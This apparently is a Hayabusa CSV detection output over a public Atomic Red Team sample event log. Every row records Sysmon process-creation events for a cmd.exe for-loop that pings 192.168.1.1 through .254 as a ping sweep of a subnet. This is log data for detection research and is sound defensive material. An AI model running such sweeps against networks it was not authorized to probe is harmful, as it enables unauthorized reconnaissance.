2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
